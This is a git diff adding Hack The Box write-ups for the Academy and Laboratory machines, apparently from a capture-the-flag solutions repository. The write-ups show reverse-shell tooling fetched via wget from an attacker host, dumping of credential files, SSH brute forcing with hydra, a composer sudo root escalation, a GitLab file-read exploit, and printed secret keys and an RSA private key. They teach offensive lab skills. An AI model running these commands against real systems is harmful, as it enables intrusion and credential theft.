+ [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.215:46024) at 2021-06-04 08:52:16 +0200
+
+ [*] Command shell session 2 opened (10.10.14.13:4444 -> 10.10.10.215:46026) at 2021-06-04 08:52:16 +0200
+ [*] Command shell session 3 opened (10.10.14.13:4444 -> 10.10.10.215:46028) at 2021-06-04 08:52:16 +0200
+ [*] Command shell session 4 opened (10.10.14.13:4444 -> 10.10.10.215:46030) at 2021-06-04 08:52:17 +0200
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+We get remote code execution as www-data!
+
+
+
+ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
+ ls -lash /home
+ total 32K
+ 4.0K drwxr-xr-x 8 root root 4.0K Aug 10 2020 .
+ 4.0K drwxr-xr-x 20 root root 4.0K Feb 10 13:12 ..
+ 4.0K drwxr-xr-x 2 21y4d 21y4d 4.0K Aug 10 2020 21y4d
+ 4.0K drwxr-xr-x 2 ch4p ch4p 4.0K Aug 10 2020 ch4p
+ 4.0K drwxr-xr-x 4 cry0l1t3 cry0l1t3 4.0K Aug 12 2020 cry0l1t3
+ 4.0K drwxr-xr-x 3 egre55 egre55 4.0K Aug 10 2020 egre55
+ 4.0K drwxr-xr-x 2 g0blin g0blin 4.0K Aug 10 2020 g0blin
+ 4.0K drwxr-xr-x 5 mrb3n mrb3n 4.0K Aug 12 2020 mrb3n
+
+
+
+Now here we get alot of different users on this box. However for now let's just get a proper reverse shell:
+
+
+ which python python3 curl wget nc
+ /usr/bin/python3
+ /usr/bin/curl
+ /usr/bin/wget
+ /usr/bin/nc
+
+
+
+Let's upload xc via wget, and then execute it to get a reverse shell:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → cp /home/nothing/HTB/Servmon/xc/xc .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → python3 -m http.server 9090
+
+
+ [term2]
+
+ wget http://10.10.14.13:9090/xc -O /tmp/xc
+
+ ls -lash /tmp/xc
+ 0 -rw-r--r-- 1 www-data www-data 0 Jun 4 07:23 /tmp/xc
+
+ chmod +x /tmp/xc
+
+ /tmp/xc 10.10.14.13 9002
+
+
+ [term3]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → ./xc -l -p 9002
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/04 09:17:49 Listening on :9002
+ 2021/06/04 09:17:49 Waiting for connections...
+ 2021/06/04 09:17:59 Connection from 10.10.10.215:59984
+ 2021/06/04 09:17:59 Stream established
+
+ [*] Auto-Plugins:
+ [xc: /var/www/html/htb-academy-dev-01/public]: !shell
+ bash: cannot set terminal process group (1039): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+Now let's upgrade it to a fully interactive shell:
+
+
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ ^Z
+ [1] + 3847836 suspended ./xc -l -p 9002
+
+ [ 10.10.14.13/23 ] [ /dev/pts/90 ] [~/HTB/Academy]
+ → stty raw -echo ; fg
+ [1] + 3847836 continued ./xc -l -p 9002
+ $ export TERM=screen-256color
+ $ export SHELL=bash
+ $stty rows 40 columns 125
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ reset
+
+
+Now that we have our fully interactive reverse TTY shell, let's enumerate the box further:
+
+
+ www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd ..
+ www-data@academy:/var/www/html/htb-academy-dev-01$ cd ..
+ www-data@academy:/var/www/html$ ls
+ academy htb-academy-dev-01 index.php
+ www-data@academy:/var/www/html$ cd academy
+ www-data@academy:/var/www/html/academy$ ls
+ app bootstrap composer.lock database phpunit.xml readme.md routes storage vendor
+ artisan composer.json config package.json public resources server.php tests webpack.mix.js
+ www-data@academy:/var/www/html/academy$ ls -a
+ . .env.example app composer.json database public routes tests
+ .. .gitattributes artisan composer.lock package.json readme.md server.php vendor
+ .env .gitignore bootstrap config phpunit.xml resources storage webpack.mix.js
+ www-data@academy:/var/www/html/academy$ cat .env
+ APP_NAME=Laravel
+ APP_ENV=local
+ APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
+ APP_DEBUG=false
+ APP_URL=http://localhost
+
+ LOG_CHANNEL=stack
+
+ DB_CONNECTION=mysql
+ DB_HOST=127.0.0.1
+ DB_PORT=3306
+ DB_DATABASE=academy
+ DB_USERNAME=dev
+ DB_PASSWORD=mySup3rP4s5w0rd!!
+
+ BROADCAST_DRIVER=log
+ CACHE_DRIVER=file
+ SESSION_DRIVER=file
+ SESSION_LIFETIME=120
+ QUEUE_DRIVER=sync
+
+ REDIS_HOST=127.0.0.1
+ REDIS_PASSWORD=null
+ REDIS_PORT=6379
+
+ MAIL_DRIVER=smtp
+ MAIL_HOST=smtp.mailtrap.io
+ MAIL_PORT=2525
+ MAIL_USERNAME=null
+ MAIL_PASSWORD=null
+ MAIL_ENCRYPTION=null
+
+ PUSHER_APP_ID=
+ PUSHER_APP_KEY=
+ PUSHER_APP_SECRET=
+ PUSHER_APP_CLUSTER=mt1
+
+ MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
+ MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
+
+
+Going back up the filetree we get a password for an user:
+
+
+ www-data@academy:/var/www/html/academy$ ls -lash .env
+ 4.0K -rw-r--r-- 1 www-data www-data 706 Aug 13 2020 .env
+
+
+
+Although obviously this isn't www-data's password, this is probably one of the other users' passwords so let's try each one using hydra :
+
+
+ [term1]
+
+ www-data@academy:/var/www/html/academy$ ls -lash .env
+ 4.0K -rw-r--r-- 1 www-data www-data 706 Aug 13 2020 .env
+ www-data@academy:/var/www/html/academy$ ls -lash /home
+ total 32K
+ 4.0K drwxr-xr-x 8 root root 4.0K Aug 10 2020 .
+ 4.0K drwxr-xr-x 20 root root 4.0K Feb 10 13:12 ..
+ 4.0K drwxr-xr-x 2 21y4d 21y4d 4.0K Aug 10 2020 21y4d
+ 4.0K drwxr-xr-x 2 ch4p ch4p 4.0K Aug 10 2020 ch4p
+ 4.0K drwxr-xr-x 4 cry0l1t3 cry0l1t3 4.0K Aug 12 2020 cry0l1t3
+ 4.0K drwxr-xr-x 3 egre55 egre55 4.0K Aug 10 2020 egre55
+ 4.0K drwxr-xr-x 2 g0blin g0blin 4.0K Aug 10 2020 g0blin
+ 4.0K drwxr-xr-x 5 mrb3n mrb3n 4.0K Aug 12 2020 mrb3n
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → cat users.txt
+ 21y4d
+ ch4p
+ cry0l1t3
+ egre55
+ g0blin
+ mrb3n
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → cat password.txt
+ mySup3rP4s5w0rd!!
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → hydra -L users.txt -P password.txt ssh://10.10.10.215
+ Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-04 09:30:00
+ [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
+ [DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
+ [DATA] attacking ssh://10.10.10.215:22/
+ [22][ssh] host: 10.10.10.215 login: cry0l1t3 password: mySup3rP4s5w0rd!!
+ 1 of 1 target successfully completed, 1 valid password found
+ Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-04 09:30:04
+
+
+
+And we found that it was the cry0l1t3 user's password! So let's login via SSH as this user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Academy]
+ → ssh cry0l1t3@10.10.10.215
+ The authenticity of host '10.10.10.215 (10.10.10.215)' can't be established.
+ ECDSA key fingerprint is SHA256:4v7BvR4VfuEwrmXljKvXmF+JjLCgP/46G78oNEHzt2c.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.215' (ECDSA) to the list of known hosts.
+ cry0l1t3@10.10.10.215's password:
+ Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Fri 04 Jun 2021 07:38:32 AM UTC
+
+ System load: 0.0
+ Usage of /: 38.3% of 13.72GB
+ Memory usage: 17%
+ Swap usage: 0%
+ Processes: 229
+ Users logged in: 0
+ IPv4 address for ens160: 10.10.10.215
+ IPv6 address for ens160: dead:beef::250:56ff:feb9:3bbc
+
+
+ 89 updates can be installed immediately.
+ 42 of these updates are security updates.
+ To see these additional updates run: apt list --upgradable
+
+
+ The list of available updates is more than a week old.
+ To check for new updates run: sudo apt update
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+
+ Last login: Wed Aug 12 21:58:45 2020 from 10.10.14.2
+ $ id
+ uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
+ $ ls
+ user.txt
+ $ cat user.txt
+ faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, let's run linpeas.sh on the box to see what are the possible privilege escalation paths:
+
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/89 ] [~/HTB/Academy]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/89 ] [~/HTB/Academy]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ $ bash
+ cry0l1t3@academy:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-04 07:40:46-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[====================================================>] 333.85K 689KB/s in 0.5s
+
+ 2021-06-04 07:40:47 (689 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ cry0l1t3@academy:~$ chmod +x /tmp/peas.sh
+
+ cry0l1t3@academy:~$ /tmp/peas.sh
+
+
+
+` 
+
+let linpeas.sh run and then as you scroll through the output you will stumble upon the **mrb3n** user's password from the TTY audit logs:
+
+
+
+This is possible because we our user is in the adm group:
+
+
+ cry0l1t3@academy:~$ id
+ uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),**4(adm)**
+
+
+
+So let's privesc to the **mrb3n** user using his password **mrb3n_Ac@d3my!**
+
+
+ cry0l1t3@academy:~$ su mrb3n
+ Password:
+ $ bash
+
+ mrb3n@academy:/home/cry0l1t3$ id
+ uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
+
+ mrb3n@academy:/home/cry0l1t3$ /tmp/peas.sh
+
+
+We run linpeas once again as the mrb3n user, and we don't see much, but when we do **sudo -l** we are hinted towards using composer:
+
+
+ mrb3n@academy:/home/cry0l1t3$ sudo -l
+ [sudo] password for mrb3n:
+ Matching Defaults entries for mrb3n on academy:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User mrb3n may run the following commands on academy:
+ (ALL) /usr/bin/composer
+
+
+Taking a look at [gtfobins](https://gtfobins.github.io/gtfobins/composer/) we get a privilege escalation path to the root user:
+
+
+ mrb3n@academy:/home/cry0l1t3$ cd ..
+ mrb3n@academy:/home$ TF=$(mktemp -d)
+ mrb3n@academy:/home$ echo '{"scripts":{"x":"/bin/sh -i 0<****& 3 1>&3 2>&3"}}' >$TF/composer.json
+ mrb3n@academy:/home$ sudo composer --working-dir=$TF run-script x
+ PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
+ PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
+ Do not run Composer as root/super user! See https://getcomposer.org/root for details
+ > /bin/sh -i 0<****& 3 1>&3 2>&3
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
+ ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get to the root user and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/53.md b/Easy/53.md
new file mode 100644
index 0000000..f20214e
--- /dev/null
+++ b/Easy/53.md
@@ -0,0 +1,575 @@
+# Laboratory Writeup
+
+
+
+## Introduction :
+
+Laboratory is an Easy Linux machine released back in November 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → nmap -vvv -p- 10.10.10.216 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 22/tcp on 10.10.10.216
+ Discovered open port 443/tcp on 10.10.10.216
+ Discovered open port 80/tcp on 10.10.10.216
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → nmap -Pn -sCV -p 22,80,443 10.10.10.216
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-04 10:19 CEST
+ Nmap scan report for 10.10.10.216
+ Host is up (0.037s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
+ | 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
+ |_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: Did not follow redirect to https://laboratory.htb/
+ 443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ |_http-title: The Laboratory
+ | ssl-cert: Subject: commonName=laboratory.htb
+ | Subject Alternative Name: DNS:git.laboratory.htb
+ | Not valid before: 2020-07-05T10:39:28
+ |_Not valid after: 2024-03-03T10:39:28
+ | tls-alpn:
+ |_ http/1.1
+ Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80/443 and the domain names **laboratory.htb** and **git.laboratory.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.216 laboratory.htb git.laboratory.htb' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → ping -c1 laboratory.htb
+ PING laboratory.htb (10.10.10.216) 56(84) bytes of data.
+ 64 bytes from laboratory.htb (10.10.10.216): icmp_seq=1 ttl=63 time=81.7 ms
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → ping -c1 git.laboratory.htb
+ PING laboratory.htb (10.10.10.216) 56(84) bytes of data.
+ 64 bytes from laboratory.htb (10.10.10.216): icmp_seq=1 ttl=63 time=35.7 ms
+
+
+
+Now let's visit it:
+
+
+
+We also find a few potential users:
+
+
+
+Now let's check out the git subdomain:
+
+
+
+We can register a test user and log into it (make sure the email address ends with **laboratory.htb**):
+
+
+
+Once our account is created we get access to the gitlab instance, and by clicking the Help tab we see that we are on a Gitlab Community Edition version 12.8.1
+
+
+
+Here we see that there is only one repository which is owned by dexter:
+
+
+
+Now since we know the Gitlab edition, let's look for exploits to use:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Laboratory]
+ → searchsploit gitlab
+ ----------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------- ---------------------------------
+ GitLab - 'impersonate' Feature Privilege Escal | ruby/webapps/40236.txt
+ GitLab 11.4.7 - RCE (Authenticated) (2) | ruby/webapps/49334.py
+ GitLab 11.4.7 - Remote Code Execution (Authent | ruby/webapps/49257.py
+ GitLab 12.9.0 - Arbitrary File Read | ruby/webapps/48431.txt
+ Gitlab 12.9.0 - Arbitrary File Read (Authentic | ruby/webapps/49076.py
+ Gitlab 6.0 - Persistent Cross-Site Scripting | php/webapps/30329.sh
+ GitLab Community Edition (CE) 13.10.3 - 'Sign_ | ruby/webapps/49822.rb
+ GitLab Community Edition (CE) 13.10.3 - User E | ruby/webapps/49821.sh
+ Gitlab-shell - Code Execution (Metasploit) | linux/remote/34362.rb
+ Jenkins Gitlab Hook Plugin 1.4.2 - Reflected C | java/webapps/47927.txt
+ NPMJS gitlabhook 0.0.17 - 'repository' Remote | json/webapps/47420.txt
+ ----------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+We could use the Authenticated Arbitrary File Read exploit, but there is an [report](https://hackerone.com/reports/827052) on hackerone that describes the intended path **CVE-2020-10977** , so let's follow it:
+
+
+
+First we create 2 projects, then we create an issue on projectA that contains the following payload inthe issue description:
+
+
+ 
+
+
+
+` 
+
+Once that's done, we move the issue to projectB:
+
+
+
+And once the issue is moved, you will see that the passwd file is linked:
+
+
+
+Here's what we get:
+
+
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ _apt:x:104:65534::/nonexistent:/bin/false
+ sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
+ git:x:998:998::/var/opt/gitlab:/bin/sh
+ gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
+ gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
+ gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
+ mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
+ registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
+ gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
+ gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh
+
+
+
+So now we verified that there was a Local File Inclusion, the hackerone report tells us that this can be leveraged to a RCE which exploits a deserialization vulnerability inside the **experimentation_subject_id** cookie. To do so we need to grab the **secrets.yml** file first with the following payload:
+
+
+ 
+
+
+
+So we just edit the description of our issue and move it to the other project once we save the changes to grab the next file:
+
+  
+
+Here's the secrets.yml file:
+
+
+ # This file is managed by gitlab-ctl. Manual changes will be
+ # erased! To change the contents below, edit /etc/gitlab/gitlab.rb
+ # and run `sudo gitlab-ctl reconfigure`.
+
+ ---
+ production:
+ db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838
+ secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
+ otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af
+ openid_connect_signing_key: |
+ -----BEGIN RSA PRIVATE KEY-----
+ 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
+ -----END RSA PRIVATE KEY-----
+
+
+
+The part of the file we need here is the **secret_key_base** value.
+
+
+ **secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3**
+
+
+
+Now that we have the secret key, we can basically leverage it to a Remote code execution, but instead of doing it manually, we're going to use metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory]
+ → msfconsole
+
+ `:oDFo:`
+ ./ymM0dayMmy/.
+ -+dHJ5aGFyZGVyIQ==+-
+ `:sm⏣~~Destroy.No.Data~~s:`
+ -+h2~~Maintain.No.Persistence~~h+-
